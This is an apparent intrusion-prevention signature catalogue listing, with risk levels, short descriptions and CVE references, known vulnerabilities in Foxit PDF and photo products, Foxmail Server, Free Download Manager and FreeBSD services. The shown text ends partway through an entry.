First detected in:

sgpkg-ips-1400-5242

Last changed:

sgpkg-ips-1400-5242

Platform:

Generic

Software:

Foxit Reader

Type:

Malfunction

Description:

There exists a use-after-free vulnerability in Foxit PDF Reader and Editor. Successful exploitation could lead in arbitrary code execution.

Situation:

File-PDF_Foxit-PDF-Reader-And-Editor-Annotation-Rotate-Use-After-Free

References:

CVE-2021-34847
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34847

Foxit-PDF-Reader-And-Editor-Exportxfadata-Handling-Remote-Code-Execution

About this vulnerability:

A vulnerability in Foxit Software PDF Reader and Editor

Risk:

High

First detected in:

sgpkg-ips-1636-5242

Last changed:

sgpkg-ips-1636-5242

Platform:

Generic

Software:

Foxit Reader

Type:

Malfunction

Description:

A remote code execution vulnerability has been reported in Foxit PDF Reader and Editor. This vulnerability is due to improper handling of the exportXFAData method. A remote attacker could exploit this vulnerability by enticing a victim user to visit a malicious web page or open a crafted PDF document. Successful exploitation could allow the attacker to execute arbitrary code under the security context of the user.

Situation:

File-PDF_Foxit-PDF-Reader-And-Editor-Exportxfadata-Handling-Remote-Code-Execution

References:

CVE-2023-27363
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27363

Foxit-PDF-Reader-JavaScript-Xfa-User-After-Free

About this vulnerability:

A vulnerability in Foxit Software PDF Reader

Risk:

Moderate

First detected in:

sgpkg-ips-1518-5242

Last changed:

sgpkg-ips-1518-5242

Platform:

Generic

Software:

Foxit Reader

Type:

Malfunction

Description:

There exists a use-after-free vulnerability in Foxit PDF Reader. Successful exploitation could lead in arbitrary code execution.

Situation:

File-PDF_Foxit-PDF-JavaScript-Xfa-User-After-Free

References:

CVE-2018-3850
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3850

Foxit-Phantompdf-Acroform-Addwatermarkfromtext-Object-Use-After-Free

About this vulnerability:

A vulnerability in Foxit Software PhantomPDF

Risk:

High

First detected in:

sgpkg-ips-1258-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Foxit Reader; PhantomPDF

Type:

Malfunction

Description:

An use-after-free vulnerability has been reported in Foxit PhantomPDF. This vulnerability is due to improper handling of AcroForm addWatermarkFromText objects. A remote attacker could exploit this vulnerability by enticing a victim user to visit a malicious web page or open a crafted PDF document. Successful exploitation could allow the attacker to execute arbitrary code under the security context of the user.

Situation:

File-PDF_Foxit-Phantompdf-Acroform-Addwatermarkfromtext-Object-Use-After-Free

References:

CVE-2020-8845
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8845

Foxit-Phantompdf-Text-Field-Object-Use-After-Free

About this vulnerability:

A vulnerability in Foxit Software PhantomPDF

Risk:

Moderate

First detected in:

sgpkg-ips-1252-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Foxit Reader; PhantomPDF

Type:

Malfunction

Description:

There exists a use-after-free vulnerability in Foxit PhantomPDF. Successful exploitation could lead in arbitrary code execution.

Situation:

File-PDF_Foxit-Phantompdf-Text-Field-Object-Use-After-Free

References:

CVE-2020-8846
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8846

Foxit-Quick-PDF-Library-CVE-2018-20247-Denial-Of-Service

About this vulnerability:

A vulnerability in Foxit Software Quick PDF Library

Risk:

Moderate

First detected in:

sgpkg-ips-1137-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Foxit Software Quick PDF Library

Type:

Input Validation

Description:

A denial of service vulnerability exists in Foxit Quick PDF Library. The vulnerability is due to improper input validation on page tree structures in a PDF file. A remote attacker may exploit this vulnerability by uploading a maliciously crafted PDF file to a vulnerable web application. Successful exploitation could result in denial-of-service conditions.

Situation:

File-PDF_Foxit-Quick-PDF-Library-CVE-2018-20247-Denial-Of-Service

References:

CVE-2018-20247
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20247

Foxit-Reader-And-Editor-Annotation-CVE-2021-34833-Use-After-Free

About this vulnerability:

A vulnerability in Foxit Software PDF Editor

Risk:

High

First detected in:

sgpkg-ips-1411-5242

Last changed:

sgpkg-ips-1411-5242

Platform:

Generic

Software:

Foxit Reader

Type:

Malfunction

Description:

A use-after-free vulnerability has been reported in Foxit Reader and Editor. This vulnerability is due to improper handling of Annotation objects. A remote attacker could exploit this vulnerability by enticing a victim user to visit a malicious web page or open a crafted PDF document. Successful exploitation could allow the attacker to execute arbitrary code under the security context of the user.

Situation:

File-PDF_Foxit-Reader-And-Editor-Annotation-CVE-2021-34833-Use-After-Free

References:

CVE-2021-34833
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34833

Foxit-Reader-And-Phantompdf-Associated-File-Type-Confusion

About this vulnerability:

A vulnerability in Foxit Software Foxit Reader

Risk:

Moderate

First detected in:

sgpkg-ips-1069-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Foxit Reader

Type:

Malfunction

Description:

Improper handling of associated file annotation objects in a PDF file causes a type confusion vulnerability in Foxit Reader. A successful exploit using a crafted file allows an attacker to execute arbitrary code on the target system.

Situation:

File-PDF_Foxit-Reader-And-Phantompdf-Associated-File-Type-Confusion

References:

CVE-2018-3843
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3843

Foxit-Reader-And-Phantompdf-Choice-Field-Use-After-Free

About this vulnerability:

A vulnerability in Foxit Software Foxit Reader

Risk:

High

First detected in:

sgpkg-ips-1316-5242

Last changed:

sgpkg-ips-1316-5242

Platform:

Generic

Software:

Foxit Reader; PhantomPDF

Type:

Malfunction

Description:

An use-after-free vulnerability has been reported in Foxit Reader and Foxit PhantomPDF. This vulnerability is due to improper handling of Choice field objects. A remote attacker could exploit this vulnerability by enticing a victim user to visit a malicious web page or open a crafted PDF document. Successful exploitation could allow the attacker to execute arbitrary code under the security context of the user.

Situation:

File-PDF_Foxit-Reader-And-Phantompdf-Choice-Field-Use-After-Free

References:

CVE-2020-13557
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13557

Foxit-Reader-And-Phantompdf-Converttopdf-CVE-2020-8844-Integer-Overflow

About this vulnerability:

A vulnerability in Foxit Software Foxit Reader

Risk:

Moderate

First detected in:

sgpkg-ips-1363-5242

Last changed:

sgpkg-ips-1363-5242

Platform:

Generic

Software:

Foxit Reader

Type:

Integer Overflow

Description:

There exists an integer overflow vulnerability in Foxit Reader and PhantomPDF. Successful exploitation could lead in arbitrary code execution.

Situation:

File-Binary_Foxit-Reader-And-Phantompdf-Converttopdf-CVE-2020-8844-Integer-Overflow

References:

CVE-2020-8844
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8844

Foxit-Reader-And-Phantompdf-Xfa-Xdpcontent-Information-Disclosure

About this vulnerability:

A vulnerability in Foxit Software Foxit Reader

Risk:

Moderate

First detected in:

sgpkg-ips-1127-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Foxit Reader

Type:

Input Validation

Description:

Improper handling of the xdpContent property of a submit object causes an information disclosure vulnerability in Foxit Readed. A successful exploit allows an attacker to gain access to potentially sensitive information.

Situation:

File-PDF_Foxit-Reader-And-Phantompdf-Xfa-Xdpcontent-Information-Disclosure

References:

CVE-2018-3956
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3956

Foxit-Reader-And-Phantonpdf-Xfa-Gotourl-Command-Injection

About this vulnerability:

A vulnerability in Foxit Software Foxit Reader

Risk:

Moderate

First detected in:

sgpkg-ips-989-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Foxit Reader

Type:

Input Validation

Description:

Improper handling of the input to the gotoURL function call causes a command injection vulnerability in Foxit Reader. A successful exploit allows an attacker to execute arbitrary commands on the target system with the privileges of the affected process.

Situation:

File-PDF_Foxit-Reader-And-Phantonpdf-Xfa-Gotourl-Command-Injection

References:

CVE-2017-10953
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10953

Foxit-Reader-Annotation-Delay-Use-After-Free

About this vulnerability:

A vulnerability in Foxit Software Foxit Reader

Risk:

Moderate

First detected in:

sgpkg-ips-1120-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Foxit Reader

Type:

Malfunction

Description:

Improper handling of freed objects causes a use-after-free vulnerability in Foxit Reader. A successful exploit may allow an attacker to execute arbitrary code on the target system.

Situation:

File-PDF_Foxit-Reader-Annotation-Delay-Use-After-Free

References:

CVE-2018-17682
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17682

Foxit-Reader-Annotations-Bordereffectintensity-Use-After-Free

About this vulnerability:

A vulnerability in Foxit Software Foxit Reader

Risk:

Moderate

First detected in:

sgpkg-ips-1089-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Foxit Reader

Type:

Malfunction

Description:

Improper handling of an annotation object causes a use after free vulnerability in Foxit Reader. A successful exploit may allow an attacker to run arbitrary code on the target system.

Situation:

File-PDF_Foxit-Reader-Annotations-Bordereffectintensity-Use-After-Free

References:

CVE-2018-14300
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14300

Foxit-Reader-Annotations-NoteIcon-Use-After-Free

About this vulnerability:

A vulnerability in Foxit Software Foxit Reader

Risk:

Moderate

First detected in:

sgpkg-ips-1096-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Foxit Reader

Type:

Malfunction

Description:

There has been reported a use-after-free vulnerability in Foxit Reader. A remote attacker could exploit this vulnerability by having the target user open a maliciously crafted PDF document. Successful exploitation could lead to arbitrary code execution.

Situation:

File-PDF_Foxit-Reader-Annotations-NoteIcon-Use-After-Free

References:

CVE-2018-14304
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14304

Foxit-Reader-Annotations-Point-Use-After-Free

About this vulnerability:

A vulnerability in Foxit Software Foxit Reader

Risk:

Moderate

First detected in:

sgpkg-ips-1088-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Foxit Reader

Type:

Malfunction

Description:

There has been reported a use after free vulnerability in Foxit Reader. A remote attacker could exploit this vulnerability by having the target user open maliciously crafted PDF document. Successful exploitation could lead in arbitrary code execution.

Situation:

File-PDF_Foxit-Reader-Annotations-Point-Use-After-Free

References:

CVE-2018-9958
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9958

Foxit-Reader-BMP-Biwidth-Heap-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in Foxit Software Foxit Reader

Risk:

Moderate

First detected in:

sgpkg-ips-1068-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Foxit Reader

Type:

Buffer Overflow

Description:

There has been reported a heap-based buffer overflow vulnerability in Foxit Reader. This vulnerability could be exploited by having a target user open a maliciously crafted BMP file.

Situation:

File-Binary_Foxit-Reader-BMP-Biwidth-Heap-Based-Buffer-Overflow

References:

CVE-2017-17557
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17557

Foxit-Reader-Converttopdf-BMP-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Foxit Software Foxit Reader

Risk:

Moderate

First detected in:

sgpkg-ips-1111-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Foxit Reader

Type:

Malfunction

Description:

Improper parsing of BMP files causes an out of bounds read vulnerability in Foxit Reader. A successful exploit may allow an attacker to gain information the helps further exploits of the system.

Situation:

File-Binary_Foxit-Reader-Converttopdf-BMP-Out-Of-Bounds-Read

References:

CVE-2018-17686
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17686

Foxit-Reader-Gotor-Action-Stack-Buffer-Overflow

About this vulnerability:	A vulnerability in Foxit Software Foxit Reader
Risk:	Moderate
First detected in:	sgpkg-ips-782-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Foxit Reader
Type:	Input Validation
Description:	Improper handling of the GoToR action in a PDF file causes a stack buffer overflow in Foxit Reader. A successful exploitation of the vulnerability allows an attacker to run arbitrary code on the target unauthenticated.
Situation:	File-PDF_Foxit-Reader-Gotor-Action-Stack-Buffer-Overflow

Foxit-Reader-Insecure-Library-Loading

About this vulnerability:

A vulnerability in Foxit Software Foxit Reader

Risk:

Moderate

First detected in:

sgpkg-ips-493-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Foxit Reader

Type:

Malfunction

Description:

A code execution vulnerability has been identified in Foxit Reader. The vulnerability is due to an improper dynamic link library (DLL) search path leading to insecure library loading. A remote attacker could exploit this vulnerability by enticing a user to open a file from a directory, which also contains a malicious DLL. A successful attack would result in execution of arbitrary code in the security context of the affected application.

Situation:

HTTP_CRL-Foxit-Reader-Insecure-Library-Loading
SMB-TCP_CHS_Foxit-Reader-Insecure-Library-Loading

References:

OSVDB-85774
http://www.osvdb.org/85774

Foxit-Reader-JavaScript-CreateTemplate-Use-After-Free

About this vulnerability:

A vulnerability in Foxit Software Foxit Reader

Risk:

Moderate

First detected in:

sgpkg-ips-1096-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Foxit Reader

Type:

Malfunction

Description:

Situation:

File-PDF_Foxit-Reader-JavaScript-CreateTemplate-Use-After-Free

References:

CVE-2018-3939
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3939

Foxit-Reader-JavaScript-getPageNumWords-Use-After-Free

About this vulnerability:

A vulnerability in Foxit Reader

Risk:

High

First detected in:

sgpkg-ips-1142-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Foxit Reader; PhantomPDF

Type:

Use-after-free

Description:

A vulnerability in Foxit Reader, Foxit Reader 9.2.0.9297 and earlier, and PhantomPDF 8.3.7.38093 and earlier, which allows remote attackers to execute arbitrary code due to the improper handling of freed objects in the JavaScript getPageNumWords method.

Situation:

File-PDF_Foxit-Reader-JavaScript-getPageNumWords-Use-After-Free

References:

CVE-2018-3964
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3964

Foxit-Reader-JavaScript-MailForm-Use-After-Free

About this vulnerability:

A vulnerability in Foxit Software Foxit Reader

Risk:

Moderate

First detected in:

sgpkg-ips-1096-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Foxit Reader

Type:

Malfunction

Description:

Situation:

File-PDF_Foxit-Reader-JavaScript-MailForm-Use-After-Free

References:

CVE-2018-3924
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3924

Foxit-Reader-JavaScript-popUpMenu-Use-After-Free

About this vulnerability:

A vulnerability in Foxit Reader

Risk:

High

First detected in:

sgpkg-ips-1153-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Foxit Reader;PhantomPDF

Type:

Use-after-free

Description:

A vulnerability in Foxit Reader, versions 9.3.0.10826 and earlier and 8.3.8.39677 and earlier, which allows remote attackers to execute arbitrary code by sending a crafted PDF file, due to the improper handling of freed objects in the JavaScript popUpMenu method.

Situation:

File-PDF_Foxit-Reader-JavaScript-popUpMenu-Use-After-Free

References:

CVE-2019-6730
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6730

Foxit-Reader-PDF-Parsing-Shading-Pattern-Integer-Overflow

About this vulnerability:

A vulnerability in Foxit Reader and PhantomPDF

Risk:

High

First detected in:

sgpkg-ips-1120-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Foxit Reader; PhantomPDF

Type:

Integer Overflow

Description:

An integer overflow vulnerability has been reported in the PDF parsing component of Foxit Reader and PhantomPDF. This vulnerability is due to insufficient input validation when parsing shading patterns in a PDF. A remote attacker could exploit this vulnerability by enticing a user to open a crafted PDF file. Successful exploitation of the vulnerability could result in the execution of arbitrary code in the security context of the target user.

Situation:

File-PDF_Foxit-Reader-PDF-Parsing-Shading-Pattern-Integer-Overflow

References:

CVE-2018-14295
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14295

Foxit-Reader-Phoneinfo.dll-Insecure-Library-Loading

About this vulnerability:

A vulnerability in Foxit Software Foxit Reader

Risk:

Moderate

First detected in:

sgpkg-ips-750-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Foxit Reader

Type:

Malfunction

Description:

An insecure library loading vulnerability exists in Foxit Reader. The vulnerability is due to the way that the affected component handles the loading of dynamic link library (.DLL) files. A remote attacker could exploit this vulnerability by enticing a target user to open a supported document file from an SMB or WebDAV share. Successful exploitation could result in arbitrary code execution in the security context of the target user.

Situation:

HTTP_CSU-Foxit-Reader-Phoneinfo.dll-Insecure-Library-Loading
SMB-TCP_CHS_Foxit-Reader-Phoneinfo.dll-Insecure-Library-Loading

References:

CVE-2016-0041
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0041

Foxit-Reader-Plugin-For-Firefox-Url-String-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Foxit Software Foxit Reader

Risk:

High

First detected in:

sgpkg-ips-503-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Foxit Reader

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability has been identified in Foxit Reader Plugin for Firefox. The vulnerability is due to a lack of bounds checking in npFoxitReaderPlugin.dll and affects handling of URLs. A remote attacker could exploit this vulnerability by enticing a target user to load a malicious PDF file. Successful exploitation would result in execution of arbitrary attacker code in the security context of the target user.

Situation:

HTTP_CSU-Foxit-Reader-Plugin-For-Firefox-Url-String-Stack-Buffer-Overflow

References:

OSVDB-89030
http://www.osvdb.org/89030

Foxit-Studio-Photo-Psd-File-Imageresourceblocks-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Foxit Software Foxit Studio Photo

Risk:

Moderate

First detected in:

sgpkg-ips-1270-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Foxit Studio Photo

Type:

Malfunction

Description:

There has been reported an out of bounds read vulnerability in Foxit Studio Photo. Successful exploitation could lead in disclosure of sensitive information.

Situation:

File-Binary_Foxit-Studio-Photo-Psd-File-Imageresourceblocks-Out-Of-Bounds-Read

References:

CVE-2020-8879
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8879

Foxit-Studio-Photo-Psd-File-Processing-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Foxit Software Foxit Studio Photo

Risk:

Moderate

First detected in:

sgpkg-ips-1253-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Foxit Studio Photo

Type:

Malfunction

Description:

Improper handling of Psd files causes an out of bounds read vulnerability in Foxit Studio. A successful exploit may allow an attacker to gian access to data on the target system.

Situation:

File-Binary_Foxit-Studio-Photo-Psd-File-Processing-Out-Of-Bounds-Read

References:

CVE-2020-8877
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8877

Foxit-Studio-Photo-Psd-File-Processing-Out-Of-Bounds-Write

About this vulnerability:

A vulnerability in Foxit Software Foxit Studio Photo

Risk:

Moderate

First detected in:

sgpkg-ips-1244-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Foxit Studio Photo

Type:

Malfunction

Description:

Improper validation of Psd file structures causes an out of bounds write vulnerability in Foxit Studio Photo. A successful exploit may allow an attacker to execute arbitrary code on the target system.

Situation:

File-Binary_Foxit-Studio-Photo-Psd-File-Processing-Out-Of-Bounds-Write

References:

CVE-2020-8878
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8878

Foxit-Studio-Photo-TIFF-File-Processing-Integer-Overflow

About this vulnerability:

A vulnerability in Foxit Studio Photo

Risk:

High

First detected in:

sgpkg-ips-1286-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Foxit Studio Photo

Type:

Integer Overflow

Description:

There exists a vulnerability in Foxit Studio Photo, versions 3.6.6.918 and earlier, which allows remote attackers to perform an out-of-bounds read and disclose information by enticing a victim to visit a malicious web page or open a crafted document.

Situation:

File-Binary_Foxit-Studio-Photo-TIFF-File-Processing-Integer-Overflow

References:

CVE-2020-8880
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8880

Foxmail-Server-User-Command-BOF

About this vulnerability:

Buffer overflow in Foxmail Server

Risk:

High

First detected in:

sgpkg-ips-28-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Foxmail Server

Type:

Buffer Overflow

Description:

Foxmail mail server contains a buffer overflow. A remote attacker could create a long USER command and overflow a buffer to execute arbitrary code on the server.

Situation:

POP3_User-Command-Buffer-Overflow

References:

CVE-2005-0635
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0635

BID-12711
http://www.securityfocus.com/bid/12711

OSVDB-14370
http://www.osvdb.org/14370

Free-Download-Manager-Remote-Control-Authorization-Header-Buffer-Overflow

About this vulnerability:

A vulnerability in Free Download Manager Remote Control Server

Risk:

High

First detected in:

sgpkg-ips-252-3038

Last changed:

sgpkg-ips-1583-5242

Platform:

Windows

Software:

Free Download Manager

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in the Remote Control Server component of Free Download Manager. The vulnerability is due to a boundary error while processing specially crafted HTTP requests containing a malformed Authorization header. Remote attackers may exploit this vulnerability to execute arbitrary code on the target server in the context of the server process.

Situation:

HTTP_CSH-Excessively-Long-Basic-Authorization-Header

References:

CVE-2009-0183
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0183

BID-33554
http://www.securityfocus.com/bid/33554

OSVDB-51745
http://www.osvdb.org/51745

Free-Download-Manager-Torrent-File-Parsing-Multiple-Buffer-Overflows

About this vulnerability:

A vulnerability in Free Download Manager.ORG Free Download Manager (FDM)

Risk:

Moderate

First detected in:

sgpkg-ips-376-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Free Download Manager

Type:

Buffer Overflow

Description:

There exist multiple buffer overflow vulnerabilities in Free Download Manager. The vulnerabilities are due to boundary errors while parsing various fields within a crafted Torrent file. Remote attackers can exploit this vulnerability by enticing a user to open a crafted Torrent file, thereby creating a denial of service condition or potentially injecting and executing arbitrary code. In an attack scenario where arbitrary code is injected and executed on the target machine, the behaviour of the target host is dependent on the intention of the malicious code. Any code injected into the vulnerable program would execute in the security context of the currently logged in user. In case if code execution is not successful, the application will terminate abnormally.

Situation:

HTTP_SS-Free-Download-Manager-Torrent-File-Parsing-Multiple-Buffer-Overflows
File-TextId_Free-Download-Manager-Torrent-File-Parsing-Multiple-Buffer-Overflows

References:

CVE-2009-0184
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0184

BID-33555
http://www.securityfocus.com/bid/33555

Free-Online-PHP-Obfuscator-Code

About this vulnerability:	Executable code obfuscated with Free Online PHP Obfuscator
Risk:	Moderate
First detected in:	sgpkg-ips-761-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Post Compromise Behaviour
Description:	Seeing obfuscated code may sometimes indicate malicious code trying to evade network inspection.
Situation:	File-Text_Free-Online-PHP-Obfuscator-Code File-Text_Globals-PHP-Obfuscator-Code

FreeBSD-Bootpd-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in FreeBSD Project bootpd

Risk:

Moderate

First detected in:

sgpkg-ips-1137-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

FreeBSD

Software:

<os>

Type:

Buffer Overflow

Description:

There has been reported a stack buffer overflow in the bootpd utility. This vulnerability can be exploited by sending crafted bootp packets to the target server. Successful exploitation may lead in arbitrary code execution or denial of service conditions.

Situation:

BOOTP_CS-FreeBSD-Bootpd-Stack-Buffer-Overflow

References:

CVE-2018-17161
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17161

FreeBSD-Bspatch-Utility-Remote-Code-Execution

About this vulnerability:

A vulnerability in FreeBSD Project FreeBSD

Risk:

Moderate

First detected in:

sgpkg-ips-783-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

FreeBSD

Software:

<os>

Type:

Malfunction

Description:

Improper validation of data legth information in patch files in the bspatch utility results in a vulnerability which can be exploited to gain the ability to execute code on the target machine.

Situation:

File-Binary_FreeBSD-Bspatch-Utility-Remote-Code-Execution

References:

CVE-2014-9862
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9862

FreeBSD-NFS-Server-Nfsm_advance-Denial-Of-Service

About this vulnerability:

A vulnerability in FreeBSD Project FreeBSD

Risk:

Moderate

First detected in:

sgpkg-ips-1148-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

FreeBSD

Software:

<os>

Type:

Integer Overflow

Description:

Improper handling of various NFS requests within the nfsm_advance function causes a vulnerability in FreeBSD. A successful exploit allows an attacker to deny service by means of panicking the kernel.

Situation:

Generic_CS-FreeBSD-NFS-Server-Nfsm_advance-Denial-Of-Service

References:

CVE-2018-17158
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17158

FreeBSD-NFS-Server-Nfsrvd_readdirplus-Denial-Of-Service

About this vulnerability:

A vulnerability in FreeBSD Project FreeBSD

Risk:

Moderate

First detected in:

sgpkg-ips-1147-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

FreeBSD

Software:

<os>

Type:

Resource Starvation

Description:

Improper handling of various NFS requests within the nfsrvd_readdirplus function causes a denial of service vulnerability in FreeBSD.

Situation:

Generic_CS-FreeBSD-NFS-Server-Nfsrvd_readdirplus-Denial-Of-Service

References:

CVE-2018-17159
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17159

FreeBSD-NFS-Server-Nfsv4-Opcode-Out-Of-Bounds-Write

About this vulnerability:

A vulnerability in FreeBSD NFS Server

Risk:

High

First detected in:

sgpkg-ips-1145-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

FreeBSD

Software:

FreeBSD NFS Server

Type:

Malfunction

Description:

A vulnerability in the FreeBSD NFS Server, versions 11.0-Stable prior to r340854 and 11.2-Releng prior to r341088, which allows remote attackers to cause a denial of service condition or execute arbitrary code by sending a crafted NFSv4 packet.

Situation:

Generic_CS-FreeBSD-NFS-Server-Nfsv4-Opcode-Out-Of-Bounds-Write

References:

CVE-2018-17157
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17157

FreeBSD-Nfs-Server-Readdir-Request-Memory-Corruption

About this vulnerability:

A vulnerability in FreeBSD Nfs server

Risk:

High

First detected in:

sgpkg-ips-596-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

FreeBSD

Software:

<os>

Type:

Input Validation

Description:

A memory corruption vulnerability has been reported in nfsrvd_readdir() function in FreeBSD NFS server. The vulnerability is due to insufficient sanitation of READDIR requests and can result in the underlying filesystem to interpret a file as a directory. A remote attacker can exploit this vulnerability using a specially crafted READDIR request. A successful exploitation can result in arbitrary code execution in the security context of the kernel. If the attack is unsuccessful, a denial of service condition may result.

Situation:

Generic_CS-FreeBSD-Nfs-Server-Readdir-Request-Memory-Corruption
Generic_UDP-BSD-Nfs-Server-Readdir-Request-Memory-Corruption

References:

CVE-2013-3266
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3266

OSVDB-92886
http://www.osvdb.org/92886

FreeBSD-Nfsd-Nfs-Mount-Request-Denial-Of-Service

About this vulnerability:

Denial of service vulnerability in the FreeBSD NFS daemon

Risk:

Moderate

First detected in:

sgpkg-ips-90-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

FreeBSD

Software:

<os>

Type:

Malfunction

Description:

FreeBSD NFS daemon has a denial of service vulnerability. A successful exploit leads to an automatic reboot of the vulnerable target host as a result of a kernel panic.

Situation:

Generic_FreeBSD-Nfsd-Nfs-Mount-Request-Denial-Of-Service-2
Generic_FreeBSD-Nfsd-Nfs-Mount-Request-Denial-Of-Service

References:

CVE-2006-0900
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0900

BID-16838
http://www.securityfocus.com/bid/16838

OSVDB-23511
http://www.osvdb.org/23511

FreeBSD-Routed-Daemon-Routing-Information-Protocol-Assertion-Failure

About this vulnerability:

A vulnerability in FreeBSD Project Routed

Risk:

High

First detected in:

sgpkg-ips-674-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

FreeBSD

Software:

<os>

Type:

Input Validation

Description:

A denial-of-service vulnerability has been reported in FreeBSD's Routed daemon, which implements the Routing Information Protocol (RIP). This daemon terminates due to an assertion failure upon receiving a specially crafted RIP request. A remote attacker can exploit this vulnerability by sending a crafted RIP request. Successful exploitation can cause a denial-of-service condition.

Situation:

Generic_UDP-FreeBSD-Routed-Daemon-Routing-Information-Protocol-Assertion-Failure

References:

CVE-2015-5674
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5674

FreeBSD-Rtsold-Dname_labeldec-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in FreeBSD Project FreeBSD

Risk:

Moderate

First detected in:

sgpkg-ips-614-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

FreeBSD

Software:

<os>

Type:

Input Validation

Description:

A buffer overflow vulnerability has been reported in FreeBSD rtsold. The vulnerability is due to improper bounds checking during a copy operation when decoding domain name label encodings in router solicitation messages. A remote unauthenticated attacker could exploit this vulnerability by sending a specially crafted router advertisement message to a host. Successful exploitation could lead to arbitrary code execution under the security context of the rtsold process.

Situation:

IPv6_FreeBSD-Rtsold-Dname_labeldec-Stack-Buffer-Overflow

References:

CVE-2014-3954
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3954

OSVDB-113610
http://www.osvdb.org/113610

FreeBSD-SCTP-ICMPv6-Denial-Of-Service

About this vulnerability:

A vulnerability in FreeBSD Project FreeBSD

Risk:

High

First detected in:

sgpkg-ips-725-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

FreeBSD

